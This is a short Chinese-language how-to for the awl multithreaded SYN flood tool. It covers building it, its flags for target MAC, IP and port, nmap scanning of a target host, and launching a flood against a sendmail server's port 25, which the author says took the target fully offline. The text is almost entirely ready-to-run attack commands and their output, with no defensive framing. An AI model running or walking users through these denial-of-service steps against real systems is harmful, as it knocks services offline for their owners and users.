awl 多线程syn攻击

一,安装:
tar -zxvf awl-0.2.tar.gz
./configure --prefix=/usr/local/awl
make 
make install

awl的执行程序安装后在/usr/local/awl/bin目录下

二,说明:
awl 的格式如下:
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d ip -p port

参数如下:
-i 发送包的接口,如果省略默认是eth0
-m 被攻击机器的mac地址,程序不能根据被攻击IP得到MAC,需要手工指定.先ping 目标IP,再arp -a就可以看到.如果省略则为ff:ff:ff:ff:ff:ff
-d 被攻击机器的IP
-p 被攻击机器的端口.

三,测试,
服务器端:Centos   5.4
对方服务器:redhat  运行邮件服务器，sendmail

1,首先得知对方IP
运行nmap -v -A 10.122.89.106 查看对方开了啥服务
[root@localhost bin]# nmap -v -A 10.122.89.106


Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2008-06-02 19:24 CST
DNS resolution of 1 IPs took 0.39s.
Initiating SYN Stealth Scan against 10.122.89.106 [1680 ports] at 19:24
Discovered open port 21/tcp on 10.122.89.106
Discovered open port 25/tcp on 10.122.89.106
Discovered open port 22/tcp on 10.122.89.106
Discovered open port 443/tcp on 10.122.89.106
Discovered open port 80/tcp on 10.122.89.106
Discovered open port 199/tcp on 10.122.89.106
Discovered open port 110/tcp on 10.122.89.106
Discovered open port 143/tcp on 10.122.89.106
Discovered open port 3306/tcp on 10.122.89.106

得知对方开了如上端口

ping 10.122.89.106 得知mac地址
查看arp -a 得知对方IP的MAC地址

2.开始攻击:
./awl -i eth0 -m aa:bb:cc:dd:ee:ff -d 10.122.89.106 -p 25

ping 10.122.89.106 -t 查下对方反应

四,测试效果
攻击一开始,对方明显挂掉,各种应用无反应,
如下是抓包:
[root@localhost ~]# tcpdump
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes